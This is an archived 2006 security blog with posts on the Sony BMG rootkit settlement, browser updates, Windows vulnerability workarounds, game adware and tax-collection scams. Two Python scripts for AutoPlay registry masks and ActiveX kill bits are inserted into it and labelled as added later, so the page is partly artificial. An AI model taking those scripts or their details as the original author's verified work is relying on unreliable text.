Friday, December 22, 2006

Sony, the class action lawsuit about their rootkit, and you . . .

Sony BMG has settled a US federal class action lawsuit over the rootkit that its copy-protected CDs silently installed on computers over the last 18 months. There are some important things you should know, even if you don't currently own one of the infected CDs from Sony BMG. (More on that in a bit.)

First, for owners of the infected CDs:

Check the list of CDs that install a rootkit if your computer's AutoPlay is enabled.

The settlement and information.



Here are some key facts as best as I currently understand them from the settlement (I am not a lawyer; these are my personal interpretations and opinions, blah blah blah).

1) If you join the settlement for the payout, you get a little over $7 and some "free" downloads. You gain the right to use their clean-up tools on your infected computers. You lose all rights to participate in any future actions against Sony BMG regarding the rootkits. You also lose the right to ask for damages to your computers.

2) If you do nothing, you get no payout, but you are still automatically considered part of the settlement and lose all rights to participate in any other class actions against Sony BMG, although if you can afford the lawyers you can still go after them yourself for specific damages to your computers/network.

3) If you opt out of the settlement by filing a form (online or by mail), you get no payout (like it's really worth anything anyway) but you preserve your right to be included in any future class actions. Oddly, according to the court document, by opting out you also deny yourself the use of the clean-up tools being provided by Sony BMG.

4) You may also choose to complain to the court about why you think this settlement is not the best solution to the problem. If you complain, you must also participate in this settlement. You may not opt out and complain . . . although I have no idea why.

Personally - I choose to opt-out.

Now for the part that applies even if you don't currently own one of the infected CDs.

Forgetting the paltry payout (is the time you spent removing that rootkit really worth $7.50?), there is the long-term view. This rootkit infected a wide audience, including military computers. Its cloaking was written so poorly that malware authors used it to hide even nastier Trojans on the infected machines.

Let's say hypothetically that several years from now you or your kids find one of these at a garage sale, a used CD store, or anywhere else that old, unloved albums get redistributed. It goes into an older computer with AutoPlay on, infects it, and the removal tools are long gone . . . it's system rebuild time, baby!

Or think of any other scenario where one of the unreturned CDs gets into your system: on loan, inherited, you name it.

What Sony BMG needs to do, in addition to providing the cleaning tools, is "face the music" (ha ha) and do an actual recall on these buggers.

Here are some final links and tips:

XCP Update/Removal tool: removes the Sony XCP rootkit. I suggest you use the remove feature, not the "update" function.

MediaMax Update/Removal tool: the other Sony DRM scheme, with severe bugs of its own. The site wants you to update, but buried deep is a Java application that purports to remove their software entirely. They also provide directions to manually remove their software (recommended!)

Protect yourself from future unexpected CD software by disabling AutoPlay. This only stops a disc from launching its installer automatically; it does nothing about a rootkit that is already on the machine, and running the disc's player program by hand will still install it.

Disable AutoPlay for Windows XP Professional
1) Click Start, Run and enter GPEDIT.MSC
2) Go to Computer Configuration, Administrative Templates, System.
3) Locate the entry "Turn off Autoplay", set it to Enabled, and choose "All drives".
4) Reboot

Disable AutoPlay for Windows XP Home
1) Create a plain text file and copy the following into it, then save:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:000000b5

2) Rename the text file's extension from ".txt" to ".reg" (without the quotes)
3) Double-click the new REG file and accept the system warning (OK)
4) Reboot

The dword is a bitmask of drive types: b5 turns AutoPlay off for CD-ROM, removable, network and unknown drives and leaves fixed disks alone; ff turns it off for every drive type. Because the key is under HKEY_CURRENT_USER it only covers the account that imported it; import it under each account that logs in, or put the same value under HKEY_LOCAL_MACHINE to cover the whole machine.
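The dword in that .reg file is a bitmask, one bit per Windows drive type. The following Python script is an added example (not code from the original post): it decodes such a mask into drive-type names, builds a mask from a list of names, and renders the matching .reg text for either hive. The bit assignments follow the documented Windows drive-type numbering; the value 0x91 labelled as the XP default is the shipped default, not something the post states.

```python
"""Decode, build and render the NoDriveTypeAutoRun bitmask.

Added example, not from the original post. Bit n of the mask disables
AutoPlay for Windows drive type n (the GetDriveType numbering); 0x80 is
the catch-all for drive types Windows cannot classify.
"""

DRIVE_TYPE_BITS = {
    "UNKNOWN": 0x01,      # DRIVE_UNKNOWN
    "NO_ROOT_DIR": 0x02,  # DRIVE_NO_ROOT_DIR (invalid root path)
    "REMOVABLE": 0x04,    # floppy, USB stick
    "FIXED": 0x08,        # hard disk
    "REMOTE": 0x10,       # network share
    "CDROM": 0x20,        # CD/DVD: the bit that stops the Sony discs
    "RAMDISK": 0x40,
    "RESERVED": 0x80,     # unspecified drive types
}
ALL_DRIVES = 0xFF          # every bit set: AutoPlay off everywhere
XP_DEFAULT = 0x91          # what Windows XP ships with: CD-ROM still enabled
HIVES = ("HKEY_CURRENT_USER", "HKEY_LOCAL_MACHINE")


def decode_autorun_mask(mask):
    """Names of the drive types on which AutoPlay is disabled by this mask."""
    if not 0 <= mask <= 0xFF:
        raise ValueError("NoDriveTypeAutoRun is an 8-bit mask, got %r" % mask)
    return {name for name, bit in DRIVE_TYPE_BITS.items() if mask & bit}


def build_autorun_mask(disabled):
    """Inverse of decode: combine named drive types into a mask."""
    mask = 0
    for name in disabled:
        mask |= DRIVE_TYPE_BITS[name]   # KeyError on an unknown name, deliberately
    return mask


def autoplay_disabled_for(mask, drive_type):
    """True when the mask turns AutoPlay off for the named drive type."""
    return bool(mask & DRIVE_TYPE_BITS[drive_type])


def render_reg(mask, hive="HKEY_CURRENT_USER"):
    """.reg text for the Explorer policy key (CRLF line ends, as regedit expects).

    HKEY_CURRENT_USER covers only the account that imports the file;
    HKEY_LOCAL_MACHINE covers every account on the machine.
    """
    if hive not in HIVES:
        raise ValueError("unexpected hive %r" % hive)
    if not 0 <= mask <= 0xFF:
        raise ValueError("mask out of range")
    key = hive + r"\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
    lines = [
        "Windows Registry Editor Version 5.00",
        "",
        "[%s]" % key,
        '"NoDriveTypeAutoRun"=dword:%08x' % mask,
    ]
    return "\r\n".join(lines) + "\r\n"


if __name__ == "__main__":
    for m in (XP_DEFAULT, 0xB5, ALL_DRIVES):
        print("0x%02x disables AutoPlay on: %s" % (m, sorted(decode_autorun_mask(m))))
    print(render_reg(ALL_DRIVES, "HKEY_LOCAL_MACHINE"))
```

Run it as-is to see what the post's b5 value and the XP default actually cover; save the output of render_reg to a .reg file to apply a mask of your own choosing.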


Cheers!

Thursday, December 21, 2006

Firefox 2.0.0.1 released - highly recommended update

If the update is not pushed to you automagically the next time you open Firefox 2.0, use the menu item Help > Check for Updates.

Firefox 2.0.0.1 release notes.

Fixes five critical vulnerabilities among other bugs. Mozilla rates a bug critical when it can be used to run attacker code and install software with no user interaction beyond normal browsing.

Tuesday, December 5, 2006

What's your real connection speed?


Speed Matters, how fast is your Internet connection?  Test by clicking on the image.



Got broadband? Are you even close to the advertised rate your DSL or cable Internet provider says you are getting? Check up on them from time to time and keep them honest.



Some typical results that you should see if your connection is healthy. The measured figures run roughly 10 to 20 percent below the advertised rate; that gap is normal protocol overhead, not a problem.

Advertised (Down / Up)     Good (typical)     Good (typical)
Connection Rates           Downlink Speed     Uplink Speed
----------------------     --------------     --------------
DSL 1.5M / 128K              1,200 Kbps          120 Kbps
DSL 3M / 256K                2,600 Kbps          236 Kbps
DSL 5M / 768K                4,300 Kbps          746 Kbps
DSL 9M / 1.5M                8,100 Kbps        1,236 Kbps

Cable 3M / 256K              2,400 Kbps          230 Kbps
Cable 6M / 256K              5,100 Kbps          230 Kbps
Cable 8M / 768K              7,000 Kbps          690 Kbps
Cable 12M / 1.0M            10,900 Kbps          920 Kbps
Cable 20M / 1.5M            18,000 Kbps        1,350 Kbps


Here are another couple of good testing links. Run several tests to different destinations and treat the upper-middle readings as closest to your actual speed; a single low result usually reflects congestion at the far end rather than your own line.



Speakeasy Multi-Destination Speed Test



DSL Reports Speedtest Selection


Thursday, November 23, 2006

Gratitude



It isn't what you have in your pocket
that makes you thankful,
but what you have in your heart.


- Author Unknown


Happy Thanksgiving everyone.

Tuesday, November 21, 2006

Dolphins - self-aware? If you think so then act.


Facts about Dolphin Drive Hunts


The petition The goal is 1,000,000 signatures. Currently just under 70,000.


Sometimes live dolphins are hoisted on ropes tied around their tail fins, said Paul Boyle, a former director of the New York Aquarium and now chief executive of the Ocean Project, an umbrella organization for more than 800 institutions worldwide working to increase awareness of oceanic issues through collaborations with zoos and museums.

Dolphins are essentially weightless in water but weigh as much as 800 pounds on land, Boyle said. When they are hung, their backbones, which resemble human spines, are wrenched apart.

"It must be excruciatingly painful," Boyle said, noting that humans complain bitterly when experiencing pain from a ruptured disc in the spine. "When we show people video from past events, every person has the same response. They say it is the most inhumane thing they have ever seen."

Friday, November 10, 2006

Note for Sheldon fans

Sheldon is moving from Comics.com (aka dilbert.com) to its own independent site. It seems that comics.com removed Dave's public notice of the move from their site.

If you like the strip, you will love what's happening now that Dave is sponsoring his strip himself: large-format daily strips, the entire archive available online, and more reliable daily updates (comics.com had a tendency to skip one every once in a while, although they would catch up a few days later).

Here's his announcement on his blog: http://sheldoncomics.com/archive/061106.html

Enjoy!

Wednesday, October 25, 2006

Firefox Tweak Guide updated for v2.0

Everything you wanted to know about customizing Firefox 2.0

The guide is designed specifically for those running Firefox on Windows XP; however, most of the tweaks in this guide also apply to Firefox on other platforms.

Opportunity

We must not only strike the iron while it is hot,
we must strike it until it is hot.


- Tom Sharp

Tuesday, October 24, 2006

Firefox 2.0 released!

Edit: it's out now on the official site. Guess they felt ready . . .

For Windows, Mac OS X and Linux i686 platforms.

Get your new and improved Firefox now.

From the source:

Firefox 2.0 will be released Tuesday at 5PM PST.

Upgrade issues/questions
-Can't connect to sites after the upgrade? Check your firewall!
-When will the auto-update happen? (Don't know yet)
-Will it keep my bookmarks and settings? Yes. You can back up your settings to be sure.

What's new?
-Phishing protection - reports if websites are possible scams
-Session saving - if Firefox crashes, when you open it again, you get the option to restore your tabs and windows
-Web feeds - improved interface for web feeds, including the option to subscribe with an external program or service
-Spell checking - squiggly red lines under words you spell wrong
-Search suggestions - common search terms are suggested as you type in the search box

What's fixed?
-Memory leaks
-Searching a page now searches within text fields

Questions
-Does Firefox 2.0 still support Windows 98? Yes. Firefox 3.0 is the release that is planned to drop support for Windows 98.
-Does Firefox 2.0 pass Acid2? Firefox 2.0 is based on the same rendering engine as Firefox 1.5, and so it doesn't pass Acid2. Firefox 3.0 will include a new version of the rendering engine which is expected to pass Acid 2.
-How do I get rid of the close buttons on tabs (go back to how Firefox 1.x was)? Type about:config in the address bar, press enter, and set browser.tabs.closeButtons to 3.

IE 7 and Quickbooks

Got this today:

Dear Valued Client,

As your QuickBooks ProAdvisor®, I wanted you to know that Microsoft will soon be sending out an automatic update to Internet Explorer, replacing Internet Explorer 6 with Internet Explorer 7. This affects users of QuickBooks®: Simple Start, QuickBooks: Basic, QuickBooks: Pro, QuickBooks: Premier, and QuickBooks Enterprise Solutions.

I am recommending that you decline the Internet Explorer 7 upgrade if you are currently using any version of QuickBooks earlier than QuickBooks 2006 Release 8 or QuickBooks Enterprise Solutions 6, Release 8.

Intuit has posted more information for you at this link:

http://www.quickbooks.com/helpcenter/IE7ResourceCenter.aspx

This approach will make sure that you are able to continue to use QuickBooks without any interruptions of the user experience.


The quick skinny:

Microsoft will be adding IE7 to the Windows Update service on the second Tuesday of November. If you are enrolled in Automatic Updates, you will be offered the upgrade at that time. My understanding is that you will have the option of refusing it, but don't count on it. If you use QuickBooks, turn off Automatic Updates until this is settled, use manual updates instead, and uncheck the selection for IE 7.

It appears that pre-2006 versions of QuickBooks are not compatible with IE 7. Intuit has announced an upcoming fix for the 2005 version and is staying "mum" about earlier versions. It's possible that anything older than 2005 will not be patched.

If you have QuickBooks 2006, you need to update it to Release 8, preferably before you install IE 7.

Monday, October 23, 2006

What's wrong with this install?

Before you click the link, how many serious problems can you identify with this installation?



(Yes, the linked site is promoting themselves, but the points they make are valid - if your alarm system looks like that, you should be concerned . . . )

One sick clippy

Would you like some help?

Learning Curves for popular editors

Learning Curves

RFID enabled credit cards storing your info in clear text?

CC company to customer: Those were lab draft editions of our new cards.

Private research to CC company: We ordered cards for ourselves as if we were normal customers for this test.

See the article:
http://news.com.com/Researchers+see+privacy+pitfalls+in+no-swipe+credit+cards/2100-1029_3-6128407.html

Excerpt:

" . . . in tests on 20 cards from Visa, MasterCard and American Express, the researchers here found that the cardholder's name and other data was being transmitted without encryption and in plain text. They could skim and store the information from a card with a device the size of a couple of paperback books, which they cobbled together from readily available computer and radio components for $150.

They say they could probably make another one even smaller and cheaper: about the size of a pack of gum for less than $50.

And because the cards can be read even through a wallet or an item of clothing, the security of the information, the researchers say, is startlingly weak. "Would you be comfortable wearing your name, your credit card number and your card expiration date on your T-shirt?" Heydt-Benjamin, a graduate student, asked."

Friday, October 20, 2006

Adware, the future of gaming?

Really interesting article about another FPS, SWAT 4, whose latest patch from Vivendi includes targeted ads within the game environment.

http://nationalcheeseemporium.org/

Note the workaround to prevent the game from talking to the ad servers.

Back to BF 2142: a good analysis is coming very soon on what it does in the background regarding ad rotation while you play. I will post that as soon as it's done.

Thursday, October 19, 2006

IE 7 Vulnerability

That didn't take very long . . .

http://secunia.com/advisories/22477/

"Description:
A vulnerability has been discovered in Internet Explorer, which can be exploited by malicious people to disclose potentially sensitive information.

The vulnerability is caused due to an error in the handling of redirections for URLs with the "mhtml:" URI handler. This can be exploited to access documents served from another web site."

Solution:
Disable active scripting support.

Note that the same bug has been sitting unpatched in your old IE 6.x since April 2006 as well . . .
http://secunia.com/advisories/19738/

At least it's not another remote code vuln.

Wi-Fi update for Windows XP SP2

Remember that Wi-Fi hack demo at the Blackhat conference a couple of months ago?

Quietly tonight, Microsoft released a really major update to help prevent that hack method. What's unusual about this release is that it includes new features, something normally reserved for add-on modules or service packs.

It's really part of a feature update to bring Windows XP into parity with the domain policy features of the upcoming Windows Server 2003 Service Pack 2 . . . but it's much more than that, and in my opinion an important update to install. I rather hope that Microsoft places this on their update site, but for now you have to go to the KB article on the topic to get the patch.

IE 7 goes gold

Just a heads up. Internet Explorer 7 is official now.

http://www.microsoft.com/windows/ie/default.mspx

Wednesday, October 18, 2006

More on the game spyware fiasco

Update to my previous post about Battlefield 2142 . . .

Some serious problems being discussed over on HardOCP about the issue.

1) The advert company in question has responded, and just as I and others guessed, Geolocation by IP address is indeed how they have implemented their targeted ads for display within the game.

2) The warning about the "adware" is INSIDE the box, not outside. Buyers have to break the seal before they get full disclosure from EA, which makes it impossible to return the game to most retailers for a refund.

3) Worse, the Microsoft Critical Update MS06-051: ''Vulnerability in the Windows kernel could result in remote code execution'' breaks the game, and Electronic Arts is recommending UNInstalling that Microsoft patch.

I cannot stress this enough. DO. NOT. UNINSTALL. THAT. PATCH! The patch in question was released just this last August and blocks a very serious security vulnerability in Windows that is being actively exploited to introduce unpatched computers to several very nasty Trojans, key loggers and rootkits.

Please tell your friends. Tell your co-workers. Spread the word about this mess to other forums and gamers that you know. The hope I have is that if everyone makes enough noise, EA will release a patch that "fixes" this and removes the spyware.

Windows Vista EULA and DIY systembuilders, at odds?

Ran across this last week, and the more I think about it, the more concerned I get. I am one of those power users that is always tweaking the system, replacing key components with newer, better options on the same system. I also have been required to reactivate my XP system several times after making a major upgrade (network card replacements seem to trigger it every time), or after re-installing the system (same disk, same PID, same system but with newer mainboard).

An excerpt: "From past experience with Windows XP, a motherboard swap triggers a re-activation. I've successfully reactivated the same copy of Windows XP a number of times after a motherboard swap with no problem. But the above terms seem to indicate that the third activation will fail, meaning you, dear reader, get to feed the Microsoft machine more money.

Or not.

If anything could be calculated to drive the DIY community away from Windows, this would be it. As it stands now, reactivating after installing a new motherboard is a minor pain, but not a big deal. And what about when you need to swap out a motherboard simply because the hardware failed? Does that count as well?"


If I read the EULA correctly, this will not be a problem if I simply want to re-install Vista to the exact same hardware (good cure for massive rootkit or virus infections) nor should it be a problem if I restore a clean image to that same system. But if I upgrade key components in the future . . . what will happen?

Read the article, tell me what you think.

Spyware, now coming to a game near you!

Electronic Arts has shipped their newest game: Battlefield 2142.

I was pretty interested in this until I discovered how they will be implementing their controversial in game advertising.

A small slip of paper in the disk case reads:

"The software may incorporate technology developed by IGA Worldwide, the advertising technology. The purpose of the advertising technology is to deliver in-game ads when you use the software while connected to the Internet. When you use the software while connected to the Internet, the advertising technology may record your IP address and other anonymous information. That advertising data is temporarily used by IGA to enable the presentation and measurement of in-game ads and other in-game objects which are uploaded temporarily to your PC or game console, and change during online gameplay. The advertising technology does not collect personal or identifiable information about you."

Let's step back and analyze that with some knowledge of modern internet tracking technology. First, dynamic IP addresses more and more are geographically assigned by your ISP. If I enter my IP address into this search page, and click the "Find City" button (and it's just one site among many) it knows where I am within about a mile radius. It knows my ISP, my country, state, town, zip code and even the rough neighborhood in which I live. It's trivial for advertisers to use that info to target local ads to my game.

If I have a static IP registered to my name or business, it's almost as easy to know my exact address, and from that I can back-search to get my name, email, phone number, age, spousal status, land ownership records, driving habits, legal records, etc.

You getting worried yet? You should! This is classic spyware/adware at its very worst. Even if they don't store the IP address permanently (and who believes that?), they already know more than they should about you just from your playing a game!

My advice, skip this one.

Updated news on this issue.

Sunday, October 8, 2006

OT: Warning - A Short Political Rant

Hasn't anyone else figured out that the entire Foley episode is another distraction? Given that certain leaders KNEW about the man's personal tastes and actions for YEARS in advance . . . and sat on the info, it should be obvious that they were saving the news for a rainy day. Just like a good poker player.



We need to be keeping a very watchful eye on the administration right now. Master-Gate is a distraction. It would be easy to state it's to distract us from the suspension of habeas corpus and other cancellations of the Bill of Rights in WA-DC, but I fear worse is coming, quietly, in the dark of night while the bright lights of the media focus on Foley, the likes of A N Smith, etc.




by Horsey on the Seattle PI

Thursday, October 5, 2006

Upcoming MS fixes on October 10

Found in my inbox today, one of the critical fixes coming October 10th will be for that nasty WebViewFolderIcon ActiveX to Windows Shell vulnerability that I mentioned last week.

********************************************************************
Title: Microsoft Security Bulletin Advanced Notification
Issued: October 05, 2006
********************************************************************

Summary
=======

On 10 October 2006 Microsoft is planning to release:

Security Updates

. Six Microsoft Security Bulletins affecting Microsoft Windows.
The highest Maximum Severity rating for these is Critical. These updates will be detectable using the Microsoft Baseline Security Analyzer. Some of these updates will require a restart.

. Four Microsoft Security Bulletins affecting Microsoft Office.
The highest Maximum Severity rating for these is Critical. These updates will be detectable using the Microsoft Baseline Security Analyzer. These updates may require a restart.


. One Microsoft Security Bulletin affecting Microsoft .NET
Framework. The highest Maximum Severity rating for this is Moderate.
These updates will be detectable using the Microsoft Baseline Security Analyzer and the Enterprise Scan Tool. These updates may require a restart.


Microsoft Windows Malicious Software Removal Tool

. Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services and the Download Center.

AV standards: out with the old, in with the new?

AV companies tend to rise and fall in effectiveness as often as the stock market. For some time now I have really come to rely on eTrust, a product by Computer Associates. I still like their corporate AV offering (and still loathe their so-called "home" version.)



But there is a new leader in town called AntiVir, by Avira, and I have to say I was impressed during my testing, both in terms of AV protection / spyware prevention and in system resource usage (very low.) It's also been garnering praise in some security professional circles.



(Note that the score table on that site shows a combined result for traditional virus protection plus malware protection, although not all the products they list do both . . . the version of AntiVir they tested does both, the versions of eTrust they tested are AV only.)



Its "for sale" version includes both malware/spyware and AV protection. They also have a free-for-personal-use edition that only includes AV protection, and it's not a limited-time offer, but really free.



The free edition of AntiVir: http://www.free-av.com/



Antivir Personal (home) Premium edition: http://www.avira.com/en/products/antivir_personaledition_premium.html



Recommended.

AV FUD and Vista

"Windows Security Center is leveling the playing field and helping customers find more options for "protection."



More technical details on kernel protection.



What I find frustrating is that products like (cough, certain really big AV firms) disable alerts from Windows Security Center (and if you uninstall their product, they generally fail to re-enable it), thus preventing the end user from ever seeing the several other excellent, and free, choices for AV protection presented by the WSC. None of which, by the way, is a Microsoft product . . .

Tuesday, October 3, 2006

Like watching a train crash . . .

This is a slightly sped up video of a computer being massively infected. The infections are real, some of the special effects are dramatized (but based on real events). You can thank SiteAdvisor (recently acquired by McAfee) for the video.





Friday, September 29, 2006

Windows Shell Vulnerability

Vulnerability in the Windows Shell could allow remote code execution.

The vector is Microsoft's WebViewFolderIcon ActiveX control (Web View). The vulnerability exists in Windows Shell and is exposed by the Web View ActiveX control.

Details and workarounds at http://www.microsoft.com/technet/security/advisory/926043.mspx

Public release of exploit code:
http://security.ithub.com/article/Exploit+Code+Published+for+Unpatched+IE+Vulnerability/189904_1.aspx

I would expect that with the public release of the vulnerability details and sample exploit code, we will see rising attacks on this over the coming weekend. People comfortable with editing the Registry should go to that first Microsoft link and apply the first workaround (setting the kill bit on the ActiveX control, which makes Internet Explorer refuse to load that control no matter which page asks for it).
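For readers who want to see what the kill-bit workaround actually writes, the following Python script is an added example, not code from the Microsoft advisory or the original post. Internet Explorer refuses to instantiate a control whose CLSID has bit 0x400 set in the "Compatibility Flags" value under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility. The script generates that .reg entry for a given CLSID, ORs the bit into any flags already present rather than overwriting them, and audits an exported .reg to report which CLSIDs are killed. The CLSID in it is an all-zero placeholder; the WebViewFolderIcon control's real CLSID is in the Microsoft advisory linked above, not here.

```python
"""Generate and audit Internet Explorer ActiveX kill-bit entries.

Added example, not from the Microsoft advisory or the original post.
PLACEHOLDER_CLSID is a dummy value; substitute the CLSID named in the
advisory for the control you want to block.
"""
import re

KILL_BIT = 0x400  # Compatibility Flags bit: IE will not instantiate the control
COMPAT_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer"
              r"\ActiveX Compatibility")
PLACEHOLDER_CLSID = "{00000000-0000-0000-0000-000000000000}"  # hypothetical

_CLSID_RE = re.compile(r"^\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}$")
_KEY_RE = re.compile(r"^\[" + re.escape(COMPAT_KEY) + r"\\(\{[0-9A-Fa-f-]{36}\})\]\s*$")
_FLAGS_RE = re.compile(r'^"Compatibility Flags"=dword:([0-9A-Fa-f]{8})\s*$')


def normalize_clsid(clsid):
    """Accept a CLSID with or without braces, any case; return the {UPPERCASE} form."""
    clsid = clsid.strip().upper()
    if not clsid.startswith("{"):
        clsid = "{" + clsid + "}"
    if not _CLSID_RE.match(clsid):
        raise ValueError("not a CLSID: %r" % clsid)
    return clsid


def has_kill_bit(flags):
    """True when the kill bit is present in a Compatibility Flags value."""
    return bool(flags & KILL_BIT)


def with_kill_bit(existing_flags=0):
    """OR the kill bit into flags already present so other compatibility bits survive."""
    return existing_flags | KILL_BIT


def kill_bit_reg(clsid, existing_flags=0):
    """Return .reg text that sets the kill bit for one control (CRLF, as regedit expects)."""
    key = COMPAT_KEY + "\\" + normalize_clsid(clsid)
    lines = [
        "Windows Registry Editor Version 5.00",
        "",
        "[%s]" % key,
        '"Compatibility Flags"=dword:%08x' % with_kill_bit(existing_flags),
    ]
    return "\r\n".join(lines) + "\r\n"


def audit_kill_bits(reg_text):
    """Parse an exported ActiveX Compatibility .reg; map CLSID -> kill bit set?

    A CLSID key that carries no Compatibility Flags value is reported as False.
    """
    result = {}
    current = None
    for line in reg_text.splitlines():
        m = _KEY_RE.match(line)
        if m:
            current = m.group(1).upper()
            result.setdefault(current, False)
            continue
        if line.startswith("["):      # some other key: stop attributing values
            current = None
            continue
        m = _FLAGS_RE.match(line)
        if m and current is not None:
            result[current] = has_kill_bit(int(m.group(1), 16))
    return result


if __name__ == "__main__":
    text = kill_bit_reg(PLACEHOLDER_CLSID, existing_flags=0x1)
    print(text)
    print(audit_kill_bits(text))
```

To check a machine, export the ActiveX Compatibility key from regedit and feed the file's contents to audit_kill_bits; a control that is missing from the result, or reported False, is still loadable by IE.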

Tuesday, September 26, 2006

VML Vulnerability: Official fix released today

Microsoft has quietly released a patch for the VML exploit today. Get it via their update service at http://windowsupdate.microsoft.com/ or wait for your automatic updates to notice it . . . personally I would not wait.

If you previously used any of the mitigating workarounds for this exploitable bug, make sure you reverse or rollback that workaround before applying the official patch.

Saturday, September 23, 2006

Friday, September 22, 2006

VML Vulnerability, workarounds and a test


Many of you may have heard about a new zero-day vulnerability that is being exploited on a large scale around the Internet. Fully patched users of Windows 2000 SP4, Windows XP SP1 and SP2, and both versions of Windows Server 2003 are exposed to the VML flaw. Infections are rising rapidly; you are at risk if you surf the web with Internet Explorer.



Yesterday I even found a "trusted" page that was serving ad banners that infected victims' computers by this method. (No link will be provided.)



Microsoft has announced they intend to provide a patch on October 10th, with a slight chance they may release it earlier - but no promises.



VML is not used widely on the Internet yet, with the notable exception of a very few graphically advanced web sites, the bad guys and Google Maps. Regarding Google, if you disable VML it will revert to normal graphic overlays if you bring up a map, so disabling VML will not block your use of their map service.



There are a few workarounds listed in Microsoft's security advisory. The one I recommend seems to cover all the vectors: it unregisters the VML shared library. To deploy this workaround (you need an administrator account, since it changes a machine-wide registration), click Start, select Run, copy the following into the Open field and click OK. You should see a message that the unregister succeeded.



regsvr32 -u "%ProgramFiles%\Common Files\Microsoft Shared\VGX\vgx.dll"



Using this workaround will cause sites that depend solely on VML to fail. Later, when the patch from Microsoft is released, reverse the workaround (do it before you apply the patch) by typing the following similar command into the same Run window (note the absence of the "-u" in the string).



regsvr32 "%ProgramFiles%\Common Files\Microsoft Shared\VGX\vgx.dll"



Other workarounds involve disabling JavaScript and ActiveX scripting, but doing that really messes up your web experience for many sites, much more so than simply disabling VML.



And finally there is an excellent third-party patch available from ZERT that leaves VML functional but closes the vulnerability. On that same page is a link that tests your browser to see if it's vulnerable or not. Use at your own risk, as Microsoft does not endorse it and does not recommend its use. In spite of that, I am now using this third-party patch and so far I highly recommend it for home and small office users. Don't unregister the VML DLL as described above if you decide to use this patch. Also, you should roll back this fix (method provided with the patch download) before applying Microsoft's official critical update for the issue, when it's finally released.

Wednesday, September 6, 2006

Back in town

Left 9 days ago for a conference and got caught in some serious stormy weather, delayed flights, the whole deal.

Whoo.

Sooooo much stuff on the security front happened and is happening. Once I get unpacked and cleaned up will start posting again.

Tuesday, August 22, 2006

Cool toy . . . NASA's World Wind

Not really security related but . . . for those into world wandering from the comfort of your office chair;



If you are a fan of Google Earth, then you may be interested in checking out NASA's World Wind open source project.



If you like what you see, and it works on your system (results vary) then definitely grab the Cache Pack and plug-ins available from the community World Wind Wiki site.



World Wind allows any user to zoom from outer space into any place on Earth. World Wind leverages satellite imagery and elevation data to allow users to experience Earth terrain in visually rich 3D, just as if they were really there. Virtually visit anyplace in the world. Look across the Andes, into the Grand Canyon, over the Alps or along the African Sahara.



Which sounds exactly like Google Earth . . . but then these details emerge:



Blue Marble - World Wind has a full copy of the Blue Marble, a spectacular true-color image of the entire Earth. Put together from data of a variety of satellites such as Terra and Aqua, the Blue Marble can be seen in all its glory at 1 km per pixel resolution. Blue Marble Next Generation is streamed from the NASA servers at 0.5 km per pixel and in 12 versions, one for each month of year.



Landsat - LandSat 7 is a collection of images from 1999-2003 at an impressive 15 m per pixel resolution. LandSat 7's resolution makes it possible to see your own city, neighborhood, or landmarks in your vicinity. Seeing the whole globe like this puts the world in context with scientifically accurate data. You can view LandSat imagery in visible colors or in False Color bands.




Highly recommended!



Edit: Ooooh, and it includes the Moon and Mars in the full install package. :grin:

Saturday, August 19, 2006

New IRS scams on the horizon

Since 2004 the IRS and Senate have been pushing new laws for approval that would allow them to outsource unpaid tax bills to private (non-government) collection agencies. In spite of resistance to the plan by the House of Representatives, it appears that the rules have been quietly approved by the Bush administration. (registration required on that last link)



In two weeks, the IRS will turn over some 12,000 names to the first three collection agencies with whom they have contracted. Approximately ten agencies in total are expected to be IRS approved by the beginning of 2008 - and they will be given at least 350,000 names.



Why is this a security related article? Because the scammers and phishers will crawl out of the foul cesspools of the dark side of the Internet to spoof people into thinking they owe the IRS money, and of course they will make it look attractive by saying that they can reduce the tax bill if the victim sends a check or credit card payment "right now" to the con artist. Meanwhile, if the victim does owe back taxes, they are still liable to the IRS and its authorized collection agencies. Being conned does not lessen one's legal obligation to pay the correct authority.



You should know the following facts to protect yourself from scammers while staying on the legal side of the real collection agencies:




1) The approved agencies are NOT allowed to communicate with you via the Internet. No email in other words. This means that ALL emails that purport to be IRS collection attempts are automatically phishing spam and should be summarily ignored and deleted.



2) The collection agencies may not ask you to send payment directly to them. Payments to satisfy in part or whole any back taxes owed will ALWAYS be sent directly to the United States Treasury. The authorized collection agencies are not allowed to collect funds directly, they can only pester the heck out of you until you pay.



3) The list of authorized collection agencies in 2006 (for now, will expand in 2007~08):

- Linebarger Goggan Blair & Sampson of Austin, Texas

- Pioneer Credit Recovery of Arcade, New York (a division of the SLM Corporation)

- CBE Group of Waterloo in Iowa



Hope this helps someone . . .

Weekend rambling thoughts

They who dream by day
are cognizant of many things
which escape those who dream
only by night.
In their gray visions
they obtain glimpses of eternity.

- Edgar Allan Poe

Friday, August 18, 2006

Microsoft patches patch - patchy schedule announced

Apparently a flaw in the much publicized MS06-040 Server service patch released this August is causing some applications that handle more than 1 GB of data to fail. It's impacting certain commercial software, like Microsoft Navision and Dynamics business applications.



This does NOT apply to 32-bit versions of Windows XP. Users of 32-bit Windows Server 2003 and 64-bit Windows XP that deal in large file transfers or data requests might need it. Microsoft is recommending that you wait for the official release in September unless you are experiencing the problem.



If you are among the unlucky ones, get the MS06-040 "beta-quality patched patch" here - and good luck. (Windows Passport or Live login may be required.)



Additionally, there is a flaw impacting users of Windows 2000 SP4 and Windows XP SP1 who installed the August MS06-042 patch: Internet Explorer crashes when visiting some sites that use HTTP 1.1 with compression. Windows XP SP2 and Server 2003 do not have the problem.



Microsoft plans to release the fixed version of this bug out of cycle on August 22nd.

Thursday, August 17, 2006

The worms crawl in, they don't crawl out

Please pass the message on to your friends to patch their Windows 2000, XP and Server 2003 machines. (Have I harped on this enough yet?)



You should also make sure your anti-virus solution is up to date and that your subscription to it is in good standing. As of this writing, only about one-third of all AV vendors have updated signatures to catch the Trojan described below. Expect the rest to be up to date within the week.



